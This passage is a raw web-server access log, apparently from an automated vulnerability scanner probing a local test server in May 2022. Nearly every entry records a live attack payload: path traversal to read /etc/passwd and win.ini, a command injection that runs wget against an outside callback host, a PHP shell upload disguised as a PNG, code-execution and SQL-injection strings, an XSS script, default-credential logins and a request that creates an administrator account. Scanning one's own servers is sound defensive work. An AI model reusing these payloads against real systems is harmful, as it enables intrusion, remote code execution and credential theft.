Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/config.exp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.210","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2e/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=fv_player_stats&player_id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?p=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /embed.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/mx_login.gif HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /JavaScriptServlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/System/MailConnect/host/c9v8hn0smpv8c57g0t00rh118p6weiis1.oast.live/port/80/secure/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0AwmuUploadFiles\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmu_nonce\x22\x0D\x0A\x0D\x0A{{wmuSecurity}}\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmuAttachmentsData\x22\x0D\x0A\x0D\x0Aundefined\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22wmu_files[0]\x22; filename=\x22rce.php\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\xFF\xD8\xFF\xE1jExifMM*\xFD\xFD\xFDi\xFD\xFD>\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xA8\xFD\xFD\xFD\xFD\xC0\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFD\xFF\xE0\xFDJFIF\xFD\xFD\xFD\xFD\xFF\xDBC\xFD\xFD\x0C\xFD\x0C\x0A\xFD\xFD\x0D\x0A\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak\x0D\x0AContent-Disposition: form-data; name=\x22postId\x22\x0D\x0A\x0D\x0A1\x0D\x0A------WebKitFormBoundary88AhjLimsDMHU1Ak--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AvalancheWeb/image?imageFilePath=C:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_users/_all_docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?location=search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filezilla.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?s=captcha HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/metadata HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.201","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitemanager.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"action=tie_ajax_search&query[]=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=command&command=set_city_timezone&value=$(wget%20http://c9v8hs0smpv8c6ag07h0t8x1ptki34mfz.oast.online)) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?aam-media=wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/90 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /provider.tf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/tasks HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sfwd-lms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.200","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jkstatus HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/91 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:27 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/Grimag/go.php?https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.197","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htmlcode/html/indexdefault.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.215","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/92 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"user_name=admin&user_password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/dologin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"TRACE / HTTP/1.1","status":"405","body_bytes_sents":"556","req_time":"0.000","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"TRACE", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /h2-console/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"{{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /front/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.056","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminer?elastic=example.com&username= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apisix/admin/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field} HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/93 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /clientaccesspolicy.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /schema HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/affwp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jw/web/; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/94 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername=HcPghN&adminpassword=N2UnhW&adminemail=test@test.com&adminname=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/default/secrets HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 